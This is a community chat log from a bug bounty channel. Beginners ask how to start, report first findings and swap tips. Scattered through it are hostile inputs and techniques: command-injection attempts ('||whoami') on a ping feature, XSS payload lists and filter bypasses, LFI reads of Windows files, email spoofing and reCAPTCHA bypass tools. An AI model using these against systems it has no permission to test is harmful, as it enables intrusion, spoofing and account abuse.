#bug-bounty
Most definitely will. Appreciate you 🙏
One last question my man @native token ....do you think with extreme hard work and hours invested learning and becoming good could I find a couple bugs within my first 3 months and perhaps make it a living eventually??? Obviously implying you're at it 24/7 ?
Possibly, it all comes down to the person learning and how well you can pick it up. I wouldn't say it's a good idea to try 24/7 until it clicks as it can lead to really bad mental health especially if you don't find anything for a period of time
If u start out trying to make money in BB you're going to have a hard time. A lot of time invested, not learn a lot, become extremely frustrated and probably burn urself out.
Unless you have a strong background coming into it
hi
Hey
Hey! Did you know that TryHackMe has its own bug bounty programme? Well you do now!
As with a bug bounty programme for any company - you must read & adhere to their rules and policies. Here is TryHackMe's: https://help.tryhackme.com/miscellaneous/the-bug-bounty-programme
Ensure you understand what you can and cannot do before attempting anything and adhere to the disclosure policy
Hii
Zuber here
Thank u !!! @native token @quasi pivot
hi i am finding a group who can become a partner for hacking with me. and learn together if anyone messages me........ 🙂
#689615473620287603 might be a better place to ask for that 🙂
yeah!
@drowsy birch I would love to be part of this group, still learning my craft but I think it would be more efficient with people to work with
yeah come in message
Hello everybody, can anyone give a methodology to hack in bug bounty? I am really stuck
Check the pins they will help
Alright
Zap or Burpsuite
In nahamsec's resources in the pins, there is an entire section with many useful tools organized into categories.
Alright thx
Hi everyone
I'm interested in how I can find vulnerable IDs, parameters, etc. in web apps for SQLi. Can anyone give me advice? Or some tools to do that? Please
Check PortSwigger's web academy
Does ZAP work the same as the spider did in the old Burp Suite?
It can serve a similar purpose
Ok
read js files for endpoints, or just fire burp and click everything.
Browse guides written to help you with your bug bounty hunt. Learn various tips, tricks and techniques and begin finding more bugs
Thx guys
found XXE on a bugbounty program XD yesterday
Do you hide your identity when performing bug bounties?
I mean, it's in the scope, but you're literally attacking them. So, I don't think it's a good idea to use our home IP right?
(Other options like VPN may or may not work depending on the technologies the clients use)
Some use a VPN/VPS some don't at all
Not at all, as in "attacking directly from their ISP-given IP address"?
Yep, i've seen a few people say they haven't used a VPN/VPS at all
If you're not doing anything out-of-scope, no need to worry about being in trouble
Companies like bug hunters, because they're basically a "free" workforce
I would suggest using a VPS/VPN when you are scanning/doing reconnaissance, as you might hit Akamai/Cloudflare and get your IP banned for 2 weeks and then you aren't able to visit stores/shops/game services.
If you do get hit by Akamai you can check it out here: https://www.akamai.com/us/en/clientrep-lookup/
Common practice is using a vpn so that aggressive wafs don’t ban your ip. Vps are used commonly to perform enumeration and scanning so once again you don’t get banned
Vpn is likely more important than a vps if you aren’t doing aggressive scanning
You mean an Akamai WAF? I thought Akamai was an ISP. I'll look that up
And yes, a target I was snooping on is using CF. But I'm not worried about getting banned (I would take measures if I did aggressive recon)
doesn't have to be aggressive tbh. One of the programs I was hacking on would ban your ip for 6 hours on CF if it detected any malicious payloads etc
Well Akamai bans you for just using subdomain discovery tools
But they work with reputation
The owners of a website can set the reputation requirement
Hey @tawdry horizon just launched his first bug bounty course! You can purchase it at a discounted price (60% off) by using the code nahomies on udemy:
https://t.co/8WOslifHsb?amp=1
Hey guys just doing the google dorking room and have a question about intitle: index.of
I was wondering why the addresses/names of the websites were blanked out from the lesson. As it says:
“I have blanked out a lot of the below to cover you, me, THM and the owners of the domains.”
try this guys

hello hello, me and a friend would like to start bug bounty a bit, does anyone know a good platform, and are there no risks in bug bounty?
Hackerone, Bugcrowd, Intigriti
There's no risk as long as you stay in scope of the programs
Okay thank u
hey people, new person here
Question for bug hunters - what was the first bug bounty you turned in?
bruteforce on login 😆
LFI,XSS,default creds 🙂
Thought I just found a SQLi... turns out to be a false positive, yay for that.
Phishing using history.back() , that got N/A
Information disclosure on error message. (Informative)
Mine was an XSS on tryhackme, along with Muirland
Where abouts?
In answer boxes, a room creator could XSS anyone going back to the page by changing the answer
Ooooo nasty
It was stored, we discovered it when some answers with special chars in were being weird and truncating. Turns out the bits that were lost ended up in the HTML tag and you could create attributes
This is great, I'm quite new to this and had not heard of history.back() or LFI. Learning more from googling, but still wish I could ask you all a ton of questions.
@vocal folio That you found your first bug bounty on the website you were probably using to learn is pretty neat.
I'd done some XSS stuff before, but was otherwise pretty new to hacking
Did you find it because you were creating a room, or were you just poking around at different things you could do on the site?
Trying to work out a bug with a room
I expect because showing directory listings is often a misconfiguration, and a great many websites would be reasonably upset at being featured on an infosec site as such.
right pointing backhand index?
👉 I suppose
Hi, I'm testing an OAuth implementation and the state parameter contains the same value for every user and doesn't change if I try to login as different users or same user multiple times. Can I abuse this in any way or isn't this a vulnerability?
!github
Hey, I'm (very) new to bug bounties, and just playing around with XSS at one of the hackerone programs.
The site I'm looking at has a profile where comments can be shared. It seems to take the user input, send it with javascript back to the server { "body": "whatever you enter"}, and then it comes back in javascript as well and is rendered on the page.
When the user data comes back, some characters are changed into unicode (I think it's unicode): for example, > comes back as \u003e in the server response, so "body": "<script>" comes back as "body": "\u003cscript\u003e"
Is there a way to get around this, escape the encapsulating javascript response, and get XSS?
Or, is there anything useful you would gather from this response, or just say its not worth digging into more?
wait what you’re new to bug bounty and got xss on a program
damn
or are you doing hacker101
There isn't XSS
Not yet anyway
Not unless they get around the filtering
right, no xss yet, just poking at the filtering. I have googled around for workarounds for the javascript to unicode filter, but didn't find anything and was wondering if anyone here had insights to share.
Also please let me know if I'm posting in the wrong place. I'm new to thm and bug hunting.
As someone with no authority, this feels right. However I'd note that you can see a lot more of the server if you verify your Discord with your THM account!
hey thanks for the tip, just did it
Nice! No problem!
Yessss, this is the right place
Yeah so I'm just poking around here, and I think it goes out in a json, and let's say I enter < > / \ ! | . & ( ) in a comment, to test special characters:
a POST goes out with:
```{...
"body": "< > / \ ! | . & ( )",
...}```
it comes back as
```{...
"body":"\u003cp\u003e\u0026lt; \u0026gt; / ! | . \u0026amp; ( )\u003c/p\u003e",
"raw_body":"\u003c \u003e / ! | . \u0026 ( )",
...}```
now in the return above, \u0026 is unicode for &. it seems to take the < and >, turn them into &lt; and &gt;, similarly & into &amp;, which kind of makes sense because those are the character entity references for those characters.
And ultimately, the comment is published on the page as:
< > / \ ! | . & ( )
Any advice for sending stuff out in the POST to try getting XSS?
Hello, I am trying to play with a ping functionality on a website. The original request is {id:3,method:"rant.ping",params:["192.168.1.5", 0]} and original response is {"id":3,"result":{"JSONRPCType":"CallableReference","javaClass":"com.redacted.network.RemoteAccessProcess$Stream","objectID":315777588}}
Then another request is made {id:4,method:".obj[273619413].getCommand",params:[]} with the response {"id":4,"result":"ping -n -c 10 -W 2 -Q 0 192.168.1.5"}
So now I tried adding like ||whoami , &&whoami after the IP in the first request, but then the last request ends up removing the IP and my command, like this {"id":13,"result":"ping -n -c 10 -W 2 -Q 0 "}
Any ideas what I can do to avoid this?
My first intuition would be that "rant.ping" fails to parse the IP address, so it is blank when the ping command is constructed.
Yeah that might be the case, have any ideas how I can play with this? I tried replacing the IP with a domain now but it couldn't resolve it
ping -n -c 10 -W 2 -Q 0 dl23l1j6c95qzxfiygccbqedy44usj.burpcollaborator.net
ping: dl23l1j6c95qzxfiygccbqedy44usj.burpcollaborator.net: Temporary failure in name resolution
Maybe it's possible to enumerate the internal network? Or, maybe there is a way to find some kind of input that passes parsing / validation but allows command injection (e.g. weird hostnames, IPV6 addresses)?
Yeah I got some different commands: ping, traceroute, dig, nslookup, but haven't found a way to get out of the parsing they do
The requests are a bit weird, not sure exactly how the backend works
Can any one suggest me some good machines that will help to improve bug hunting?
There’s not really any machine per se that will help directly with this, but portswigger has an amazing training program that’s free that touches on the OWASP top 10 you could check out @marsh lava
Ok thanks @native token
Is there any CVE for nginx/1.16.1 , I tried googling but I am not so good with searching exploits
or security exploits*
I'm gonna make two statements, and I think someone's already discussed them with you
- Many bug bounties have an NDA
- What'd stop us from stealing the bounties?
There are sites with CVEs broken down by product version
I'd start there.
The program name because i haven't said it 🤷🏻♀️
and any such website name please , I will google it
That was easy.
Ahaa cool thanks 
Try googling what you want first
Because google has infinite patience.
Note that, sometimes a CVE entry does not provide the version of the product that is being searched, but rather provides the version of the library or other component that the searched item uses. For example, for NGINX, there are 2019 entries that show the version of njs, the scripting language for NGINX, without mentioning the version of NGINX.
Hello I sent an e-mail 2 days ago to report a bug, but there was still no reply. When do you return?
If this is for THM then shouldn’t take more than a week
Yea, for THM. 2 days have passed now, thanks for the information
If you don't get a reply your bug was likely low severity 🙂
Generally the admins don't reply to duplicate bugs / low sev bugs
Oh maybe. But we take time for it, I think they should give a positive or negative reply
I think they should do, but they're very very busy 😦
Thank you so much for submitting though!!!
We appreciate it 😄
😂 😂 😂 😂
.
How serious of a bug is being able to leak chat logs?
Depends on context and whether the user should be able to view chat logs, what the logs contain etc
It could range from a low all the way up to high
Aye you can view the whole chat logs, thousands of them. Tis my first submitted report xD
hi, can we do bug bounty as a minor? if yes, can you give me a reliable platform that accepts minors, thank you
Some programs require you to be a certain age, but there are quite a few that don't have an age limit. Hackerone and bugcrowd are pretty big platforms, check them out
But if you’re a minor in the ToS you have to get your parents to submit the report
And this is bugcrowds
Yeswehack I couldn't seem to find but you'll have to read the programs scope
last little question before I stop bothering you xD, does bug bounty require a good level?
As some may say you need to be 16 or 18+
Not really, as long as you know web app hacking
There have been people who may have started and got a bug in one month being new to it, and some others may take time. I remember speaking to someone and they said it took them 6 months to find their first bug
I am only 15 years old and I am interested in pentesting it is my passion I have more or less the basics but I wonder if it will be enough ....
As long as you're passionate about it you'll do great
Passion and dedication goes a long way
thank you very much
@fallen palm also you can select 3 options:
Be white hat but get less money
Be grey hat and get more money
Be black hat and get most money
Rule 9: No discussion of illegal/unethical topics or actions. If the target device doesn't belong to you, and you don't have specific permission to perform an attack from the owner of the target: you don't do it, and we don't talk about it. This also applies to software licenses / copyright violations. If in doubt, please ask a moderator before posting your message -- preferably without breaking rule 1. Whether an action is illegal or not is at the sole discretion of the moderation team.
White hat or no hat.
@lavish hollow I said only options
Read the rule "No discussion"
So word black hat is banned lol
Telling someone they can earn more money for being a black hat is unethical and bad.
I'm not black hat, I'm white hat, I just said what's true
have u heard smth called jail 
Yes
-warn @inner sierra Do not discuss blackhat activities. Especially do not encourage them.
⚠ Warned Adduck#0646
-mute @inner sierra 5m Please stop arguing. Encouraging blackhat activity will not be tolerated.
🔇 Muted Adduck#0646 for 5 minutes
Depends on the company & bug.
Google, security bug
depends on the vulnerability and impact
If you mean someone else's email, that will probably have a big payout.
About?
What about this example
Checking their program description would help you more than asking someone?
You will get it with help of forgot password LOL
- Make basic report
- Make complex report
what?
Nothing
Most companies will have a bug-bounty contract which tells you almost everything, rewards included. It is important to remember that these payouts are most likely not enough to live on.
What’s the best way to get into bug bounties? I have a basic-intermediate understanding of Mac and Windows OS exploitation. I just can’t find anything straightforward online
Learn web hacking
Sadly having knowledge of OS exploitation isn't gunna help too much here, best thing is to scratch up on your OWASP top 10 and also OWASP WSTG
I need some help understanding this— I can scan webpages for open ports using nmap, and usually they come back with ports 443 8080 and 80 open. How can I exploit them?
Thank you bye
Btw
If there was a simple answer there, everyone would be doing bug bounty.
You need to learn web hacking.
How? Any good websites? I’ve been looking for a while but can’t seem to find any
TryHackMe. Portswigger academy. Don't scan random websites.
Great. Thank you
Bug bounty seems to have a false stigma that it is beginner friendly, when in actuality it isn't even close
Unless you put enough time to fully understand what you are testing for you're unlikely to find anything at all and just waste time. You have to remember the websites that are offering bounties have likely already had a pentest/red team evaluation so you're literally clawing for the bits they missed
That seems to be similar to what I’ve gathered before from my quest to find easyish bounties. Thanks for confirming lol
Good Morning 🙂
Is this still for a CTF?
When I use forgot password on a website, it itself changes the account password (generally we have the password reset link, right?), but here we directly get the new password of the account. So if I send 100s of password reset requests, I can't log in because the password gets changed literally every second; an attacker could use a VPS
Impact: Deny access to the genuine user into his own account (even if he is in the account, because the cookies will expire sooner or later)
Worth reporting ?
i assume you need to be logged in to request the password reset?
so anyone can reset anyone's password ?
forgot password
of course that's worth reporting
Well I can reset , but I won't know his password
how will the user know the new password?
His mail
@spare cairn can I dm you? 🤔
but if I changed his password every second , I don't think his inbox would be of any help
yup , I am always open to dm
@jake what should the weakness be though
It's caused by rate limiting but denies access to the user ?
@quartz aspen
uhhh
well there definitely should be some rate limiting
but i've never submitted a bug before so i don't know the format sorry
oo nevermind
thank you for the help🙂
Reported !
Another doubt
On signing up , The Sign up token is disclosed visible via the network tab>response
that means I can sign up as any email because I will have the token
Any way to make it more severe ?
@spare cairn Best odds is to try and use that to sign up with an email from that company
e.g if you were creating an account on logitech try thegoodguy@logitech.com. Sometimes they will give accounts from their own trusted domain additional permissions
I already submitted, but I tried. It treats every account the same irrespective of the email domain
1 got Dupe 
waiting for the second
Still not sure , the triager didn't add me in the original report
I requested to , let's see
As long as u learnt something it's not wasted time :)
Question ~ If an "alert" payload (cross-site scripting) was echoed on a site in JS code, would that be enough for a report? I'm new, so sorry if it's a dumb question lol. Not sure if I need to "prove concept" anymore than just researching the impact of it. along with directories base64 encoded for the webserver. fishing around those now to see what goodies i can find.
Well that is a really weird way to implement forgot password.. Normally you get an email like "reset your password via this link XXXXXX" and then you can change it.. It shouldn't change automatically, seems like a bit of lazy programming ?
So the weakness is that it automatically changes the password without any verification. Check if you can catch an account-ID with burpsuite while requesting this with an email.. Maybe you can manipulate it to an admin account
So let's say your account is ID 190 and you catch that, change it to ID 1 and you probably get a password in your mail from an account with too many rights 🙂
Might be, but the bounty is probably not going to be that high. Thing is, you already found a weak point so you might be better off digging into the weakpoint you found to test how serious it really is. Then you'll probably get a bigger bounty.
thanks ❤️
Good luck with it! THM has some seriously good rooms for XSS if you need to freshen up your skills
I chained it with no rate limiting on forgot password
and the final impact was i could deny any user access to his own account by changing his password every second
But both issues were already reported
hello everyone, i have a question
Do you think it is possible to have good bug bounty results without using burp?
It's possible yes, you also have ZAP
never heard about this, i'll check this rn
okay now i see, thank you
hi guys, I'm Othmane and I'm honored to be here with you. So I wanna start bug bounty and I don't know where to start, I need some help. I have some questions about bug bounty and I have basic information in the IT field. I don't need someone to tell me step by step, just tips, and thank you
Tip 1. Don't expect to make money from it. Don't do it for the money.
yes I know this, but I need some platform or book for beginners, something like this?
thank you, this is my last question: what's the difference between penetration testing and bug bounty? can you explain to me please ?
Did you google it?
Because google it
I watched a lot of videos on YouTube and I didn't find the response
It is a basic research question
You will not get far in security if you cannot research. We will not do your research for you.
thank you for your time
@grand thistle We don't do those links here
pentesting is usually testing an application prior to it being released onto production servers, or returning to an application after several updates to identify vulnerabilities.
Bug bounty is kinda like a cleanup crew who go hunting for the bugs that the pentesters may have missed
thank you
No problem, I get some questions aren't always easily answered online 🙂
A lot of manual labour
robots has its uses but you need to be able to figure out for yourself which ones may be of interest
https://github.com/andresriancho/enumerate-iam
got this script to check for iam permissions with aws tokens
But this script hangs after a while
Any other alternative script anyone uses ?
Hi guys,
After several attempts, I think I encountered a problem in the Alfred room.
I followed all the instructions correctly (I think), but I cannot find the root.txt file.
I did a search -f root.txt or even looked in C:/Windows/System32/config (as found in writeups), but nothing.
Does somebody have an idea?
Thanks
PS: I hope to be in the right group
@empty horizon #room-bugs but you've probably missed the step where you need to migrate.
You can ask for help in #room-hints or #room-help
@vocal folio ohh sorry will move in this room. you are probably right but I can't find my mistake
will do thanks @vocal folio
Export the directory/file list to a text file, and use gowitness on it, so u will have clean ss of all, then u can choose where to look.
Would you say an account switch in the url is a bug when password authentication gets ignored by it?
Are you already authenticated in the other account?
Nope
Not a bug. It’s a feature 🙂 @fallen palm
Ah. So a currently signed out user can be relogged like that without authentication again?
cookies but automatic sign in if you manually signed out🤔
It's sus
Hey! I've just found my very first vulnerability on a website, it lets a malicious user send a customizable mail from the website's official email address to any of the website's users. Any potential attack other than social engineering?
That's not really a bug bounty bug tho more of a pentest style bug
using https://emkei.cz/ ? Many times that's OOS , so just be sure
I don't think there is any other way of exploiting it
Emkei's Fake Mailer
yeah I know , this type of bug won't be paid for
Welcome to the fun part of bug bounty. You have to figure out a payload that bypasses it
It's where most of the money comes from in bug bounty
finding bypasses for existing filters
Good luck finding it
Chances are you'll find the CF IP and just get direct access denied
Dropping this here... don’t go scanning like a clown when attempting bug bounty
@prime cipher Think I might go for this - https://www.amazon.co.uk/30-Piece-Lock-Transparent-LockCowboy-Locksmiths/dp/B07WYPJSD5/
Looks good 🙂
is sqlmap not the way forward 😮
Naughty boy!
That wasn’t aimed at me
This is an email a program sent out and is doing the rounds on Twitter
ffuf scan caused outage 🤔
That must have been a lot of requests for that to happen
I wonder how many threads they ran to cause that
Might shock you to know that it does happen with any scanning tools
I’d probably take a guess and say it was someone using axiom
I know but I always set the threads to low , 1-2 requests per second
that mail said 100 requests/minute , that is not even 2 requests / second , that's slow
That’s the rules of most programs
Slow it may be but realistically, tools like ffuf aren’t needed for much bounty work
Maybe to scan an api but if you’re straight up brute forcing from the get go hunting for directories you may wanna reevaluate your approach
I just use burp and sometimes gobuster
ffuf scan causing an outage? bruh
when they host their servers on the free tier
@quartz aspen that's a new level of ignorance... Http/s traffic caused when brute forcing on high threads can cause it to happen
for sure, but the server should have enough resources to handle it from one client, especially if they're hosting a bug bounty, the second comment was just a joke lol
Fire axiom at it with ffuf and you'll soon realise that it can be used as a tool to dos a site
i'm not sure what axiom is
Create browser bots quickly, without code.
you can just spin up 15 boxes, perform a distributed nmap/ffuf/screenshotting scan
so it's not from one client
Yea I want to bypass the cloudflare IP, but I tried a lot, and It never worked :/
GitHub / GitLab Recon
(I used my GitLab account, since I haven't uploaded anything sensitive there. This tool works very well with GitHub)
Repo: https://t.co/3rtXeRYaDk
Credit: GONZOsint
#cybersecurity #bugbounty #osint #ctf #osinttools #github #gitlab #infosec #recon
https://packetstormsecurity.com/files/156269/Google-Invisible-RECAPTCHA-3-Spoof-Bypass.html#:~:text=This tool allows a user,providing the victims site key.
Is this still valid in case anyone used it recently ?
Bypassing google recaptcha v3
what would you say your guys' bug bounty methodology is? i assume it starts with gathering endpoints, subdomains, exploring the site, etc
For now , I don't do heavy research , just check the sign up, login , forgot password endpoints then in the account , no extra tools except burp ( that too when i need intruder )
I will slowly move towards using enumeration
But for normal Bug hunters , it's what you mentioned
I don't have any idea but many beginner bug hunters usually look for xss and idors
@short drift This is usually the initial stuff I'd check for.
you have good resource for google recaptcha v3 bypass ?
It doesn't give any captchas to solve but generates a token, so I can't try that endpoint in burp
Not so much resources but take a second to look at how the handshake works
usually it'll return a completed hash (Not sure about v3) which is used to identify that it has been checked
If you drop the request that is sent, check if it times out
if it isn't timing out or set to destroy the hash after it's used, then that's an issue
I don't tend to focus any amount of time to it lately though as it isn't usually anything major
I could enumerate emails if i could bypass it
I mean i can still do it, but it's manual
I mean from what I understand recaptcha 3 has only been going strong for 8 months or so
I'd say fiddle and try to find a bypass yourself, as then you can start doing the rounds on all programs with it implemented
umm that's what i am trying to find
Thank you for the help 😄
Chances are if anyone has a bypass they aren't disclosing as it's a great income
https://mikko-kenttala.medium.com/zero-click-vulnerability-in-apples-macos-mail-59e0c14b106c Vulnerability reported in May, fixed in July, publicly disclosed in November and still being evaluated for bug bounty.
for those looking to improve bug hunting methodology here is a good resource from @mystic moat ❤️ https://thexssrat.podia.com/free-bug-bounty-guide-essentials-video-only-slimmed-down?coupon=SFGHGFHFSTGHTRRBSFNFGSHSGFHBGFSBHB&product_id=HzT_ERAFTskvypW9Hg_kfA%3D%3D&product_permalink=iRXod&sale_id=-2RemKOgZrkfGdDvCJKm4A%3D%3D
Hello anyone here
Yes
if I add a single quote in the page param, it delays a lot, and when I delete it, it works
is this SQL injection? I tried a lot of payloads to make sure but all only made delays, is there any
unless you're calling some sort of sleep function within sql, probably not
there might be a lot of data to search through, so it might take time to search the whole dataset for a '
Hey. Is it possible to exploit OOB XXE without Burp Collaborator? I'm kinda new to hacking
Bug hunting tips whole book https://gowsundar.gitbook.io/book-of-bugbounty-tips/api
If the program is not running cloudflare try launching sqlmap and see if u get anything .
I just submitted my first bug today 
P5 though 🤡
Bug bounty's are way different than CTF's
Yes it's possible, u may also use DNSbin for that; basically the idea is to use a server u control for getting the response.
Just realized there is no follow feature on bugcrowd 
hi
I am testing a parameter that reflects my input in a JavaScript function ..
my input is "123" :
the result is :
var _nifra = true;try {if (window.top != window){_nifra = false;}} catch(e){_nifra = false;}if(_nifra && typeof 123 === 'function'){123(true);}
the parameter name is {JSONP_call=}
any help?

@everyone
what
Serpscan is a powerful PHP tool designed to allow you to leverage the power of dorking straight from the comfort of your command line.
https://alaa0x2.medium.com/serpscan-automate-your-recon-using-search-engines-6a8cc2b1a3b3
Guys can anyone help me with creating a PoC ? One of my clients has missing SPF records but I need a PoC and emkei.cz is not working anymore
heyya , a missing SPF record is mostly out of scope , please do check the OOS before submitting it
what's the bug ?
It was a blank page and if you enter something in url say url/some_text then the website showed some_text on screen
Not a big thing ig
Yeah did that, that's why I am asking
tried xss ?
Yes but it didn't work
is the program public ? I will have to check a bit
oo ok nvm
No it's a contract based thing
Part of my internship
Usually Emkei does the trick
let me check the web
But it's not working right now
not even to spam folder ?
Nopes
It's showing that mail is sent
But doesn't even show up in spam
I tried adding a "Reply-To" header but even that doesn't work
sorry but without the domain info , I really can't help you
Maybe try reading hackerone reports
More than the domain, any suggestions for an alternative service ?
I tried most of the listed ones but none are satisfactory
emkei is best in this term
maybe the service is not vulnerable
It is, because I tried some other such services but they charge bucks or else send a postscript note :(
https://github.com/mikechabot/smtp-email-spoofer-py
never tried it though
Did u try HTML injection, SSTI?
Ssti typically depends on how the server is processing data. Very rare you’d find it in this instance
Sorry i just woke up
I tried all of them mentioned in web application hackers handbook
Question: I hear Bug bounties are competitive in nature which makes me feel a bit put off from getting into it.
I am studying cyber security and looking to get into pentesting but also want to live in other countries at the same time, which is attracting me to bug bounties instead due to its remote nature.
I have a passion for cyber security in general but i really want to find a way not to be tied to one company because i love living in multiple places all the time.
I know it's a bit of a random question, I guess I'm having a direction crisis right now
My goal is to live and work remotely, I do have other online businesses set up so I would not just be relying on bug bounties.
free lancer
do pentesting, sometimes bug bounty, and live ur life, but u have to be very experienced for it
@young leaf Could TryHackMe be a perfect place to learn for bug bounty?
It can be, TryHackMe teaches you skills that you could use doing bug bounties
I have been using tryhackme and a few other sites. Is there anything else I need to learn before doing bug bounty?
You should always need to learn new things
Where else could I learn?
It isn't about learning from 10 different places, TryHackMe should give you a great foundation for bug bounties
But you could go for OSCP or something like that
I'm using their labs.
It depends on how you are, bug bounties can be hard; from what I have heard on a few podcasts it takes days or weeks to find a bug
But it all depends on your skills 😉
@hardy ginkgo I feel like there's more I need to learn.
Then you should learn more before starting
Ok.
@hardy ginkgo How do hackers find new vulnerabilities? Where do they look first?
They mostly start with exploring their target to find odd things, outdated stuff etc
But cant say for sure I am a beginner myself ;p
But with a lab I normally start scanning the hosts to see what is up and running, after that if there's a webserver available checking for vulnerabilities and hidden directories etc
You should learn yourself a basic set of steps that you always will perform to get information about the target before starting to exploit
Ight.
You could ask these questions in general there are a few OSCPs that are really advanced
Oscp won’t really help with bug bounty as much as something like portswigger tbh
Portswigger has a massive lab that covers owasp top 10 and are likely to be found in webapps
Learn the fundamentals of web app testing from thm and portswigger, become very familiar with owasp top 10 and practice. You’ll be a step closer
@faint forum check pins
Anybody have a pentesting video to complete knowledge??
Ty
That's a very vague question my friend
Pentesting video
On what topic? Penetration testing and bug hunting are different.
On url https://tryhackme.com/paths , a request is made on http://www.w3.org/2000/svg , shouldn't it be https? It may only be on the Pentesting Path page
Bug hunting
Hey im getting through portswiggers academy but i need an alternative to Burpsuite Intruder for brute-forcing parameters.
Its very slow due to the rate limit.
Any ideas?
Owasp zap
It has a feature like intruder?
Im trying to brute force a number from 1000-9999 from an intercepted post request
Its intruder is more fast than burp cm
I have used owasp zap on portswigger and its perfectly fine
OK perfect thanks i will check it out
Im going to use ZAP and burp together until i can afford a PRO license
Or then again, get comfortable with ZAP, and see if you still need burp for something 🙂
Well I still prefer burp cm bz of its cleaner ui than zap, only use zap for intruder based attacks, but that's just my preference
Sure, that's up to your preference.
Get ur base ready first do thm web app path,portswigger and then watch nahamsec for live recon,stok,insiderphd and zseno's live bug hunt.
Im trying to intercept a request with ZAP and then edit it, and then send it to be fuzzed but the edits are not reflected when I send it to the fuzzer
Im trying to solve this lab with ZAP but zap is all new to me
https://portswigger.net/web-security/authentication/multi-factor/lab-2fa-broken-logic
Hey, I am 13 years old, I wanna become a bug bounty hunter, how can I start?
Why are u asking same question again and again lol
Honestly, the best way to start is learning the paths on TryHackMe and to build a foundation on learning how networks and web applications work. But, what do I know, I've only been doing this for 34 days.
Ok i will try tryhackme
Because I don't understand the github link
https://academy.hackthebox.eu/ this can also help
Ok
It's paid🥲
🥲 🥲
@elder junco u have any free course?
Its free
Ok wait
1 - Can u already hack?
2 - Why do u want to do bug bounties?
Ya i was a cr4cker a month ago
I want to join bug bounty because I liked that field and in future it will have higher demand
If that is what I think I'd quickly think about ur position here, we are ethical hackers here.
If you are chasing the money from the get go, thats a bad idea. Use it as a learning experience.
I know u r ethical hackers
Ok then which field I should go?
Web or app
Doing bug bounties is fine but A LOT of people start it chasing the money. You can go like 4 months and only make $100. You're better off learning hacking as a broad subject, then applying urself.
That's up to you, they have similarities depending on how you look at them.
U will not believe what I am saying now
I am 14 years old kid lol
But I am interested in hacking and all this kinda stuff
Ok then I will learn basics of bug bounty then go for ethical hacking
Aye use TryHackMe and get your general hacking knowledge down. When you're comfy try poking around a few bug bounty programs
If u jump straight to bug bounties you're going to have a very bad time, also potentially be kicked off the programs.
Can I have link for hacking of tryhackme
Lol
@quasi pivot tell till where should i learn
i am at linux commands part 2
@faint forum there is no end to learning
Everyone u see doing bounties keep learning
!docs free-path
I've learnt A LOT doing bounties, I started doing them for this reason.
Me too. Most important lesson i learnt is,
There is only one chance to prove impact. So don't be lazy.
😅
I always panic write the writeup cause I don't want a dupe (had 0 dupes so far)
I reported a bug "Phishing using history.back() function" but I made it that way so the user has to click.
They said more info.
I supplied them a webpage and an attack which requires no interaction but didn't get a reply lol
@quasi pivot which operating system is best kali or Ubuntu
Noice lol
For starting out I'd use Kali, then move on from there if u want
For bug hunting I personally use Windows and an Ubuntu VPS
hmm
ok i will go for kali
And I have a question what are labs @tall slate @quasi pivot
On TryHackMe? They're machines you can attack. We tend to call them rooms.
hmm
Which one do you guys like hackerone or bugcrowd
what r they?
Ok
I like hackerone.
I too use hackerone
That im yet to try tho heard its good.
Yeah they mainly have European companies ig🤔
Yes
idk if it is only european companies but i think so
But they still have a lot of companies
Cool
hackerone and bugcrowd are the most famous ones followed by intigriti,synack,yeswehack and some more
I really want to join Synack
I am going to subscribe to HTB to do their path on Synack RT
Hello people i need some help about bugcrowd site
What help do you need with it?
I just need someone who will explain to me how to do it. I mean I can read what is in the scope and everything but I don't know how I can start... So I need someone in my dm who will help me.
check for vulnerabilities which are not out of scope, some common ones are stored xss and idor
When automating stuff, don't send more than 1 req/sec
I just don't understand how people start searching for some stuff. I know people use burp but they just start burp suite against some site and that's it?
sites which have programs on bug bounty sites; you have to learn about different vulnerabilities
portswigger lab is a good resource
basically , find a good program , read their policy ( in-scope and out of scope )
Try to find vulnerabilities in their site making sure to not affect other users (no dos mainly)
So I can use Burp Suite and connect on their website?
yup
As long as you're not doing anything OOS you'll be fine
Hey has anyone worked with AWS ?
Can anyone tell if X-Amz-Credential means something important ?
Authenticate requests using the query parameters to express a request entirely in a URL.
Congrats
This is infuriating me.
Yesterday they said they're paying a bounty and wanna get an audit done
And now this
Ah, do they have a bug bounty program?
No, it's a place a friend works for and they asked me to take a look and yesterday they sent a mail for $$$
Then that's expected. Though even what they are offering without a Bug Bounty program is a good catch.
Did you tell them about the mail about the $$ you received?
Yup. These corporates are horrible.
They legit had a "backup" of their config files lying right there on the server along with some Rate Limit Bypasses
im doing bug bounty rn, is there any obfuscated xss payload that doesnt use < ?
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS Injection/Intruders/BRUTELOGIC-XSS-STRINGS.txt I'd check these out maybe some will work
ight thx
Ah, bypassing a filter I see. Open Twitter, search #bugbounty followed by the vuln name, u will find a lot of bypasses, gl
I found a param which reflects the text on the site
Maybe it is vulnerable to xss , the program is from intigriti and currently suspended , but may become active
Anyone want to collab? If we get a bounty, you keep 75%
DM 😉
That's user supplied text being handled safely - escaped properly but I believe escaped twice?
ight
i have a question
if I make a new account on a website, add 2fa and link a google account
then logout and login via the google acc
and there's no 2fa needed?
is that bypass?
No, because all you've done is switch the verification over to Google
While hunting i came across one Url which reveals the account token and with the help of that token i can reset password of that account?
So this vulnerability is which type of vulnerability..
And should I report it
Please tell me
If it’s just your token, I don’t think it’s reportable. If you find a way to get other people’s tokens, I would definitely report that
Okk working on it!!
Can someone tell me what the hell is this
The contents moved out on specific payload
I can print things outside the box 😂
peace and love
Visit the help site
Learn how to sync your THM profile to Discord
Learn about our student discount programme
View all the TryHackMe levels & point requirements
Get started with making TryHackMe room
Learn about the TryHackMe room review process
Read about the TryHackMe API
How to play TryHackMe's King of the Hill (KoTH)
What rooms should you do? A free guide for beginners
Learn about TryHackMe's Bug Bounty Programme!
!docs free-path
.
Can anyone take me in their team
I know more than basics of the bug bounty looking for a team to improve my skills
!docs student
There's the web path
Apparently TryHackMe has an admin portal at <admin.tryhackme.com> wonder if anyone's ever had a look at it for the bug bounty
That is just so believable that I wouldn't even click on it.
it's where I found the key to #advanced-advanced-general
So you want to get started with Bug Bounty? nice
Maybe earn some extra cash while keeping the internet safe?
Well here are 500+ free exercises to get you from zero to hero in no time!
Visit https://stokfredrik.com/bugbountytraining to get all the links to the resources mentioned in this video.. and more!
This video is sponsored by Intigriti...
!docs levels
can somebody please tell me how i can buy a Sub...it says your card does not support
Hey guys can anyone help me with an LFI on windows ?
I'm hunting for a bug and I can read files from the Windows server like :
C:\Windows\System32\drivers\etc\hosts
But how can use this to exploit further ?
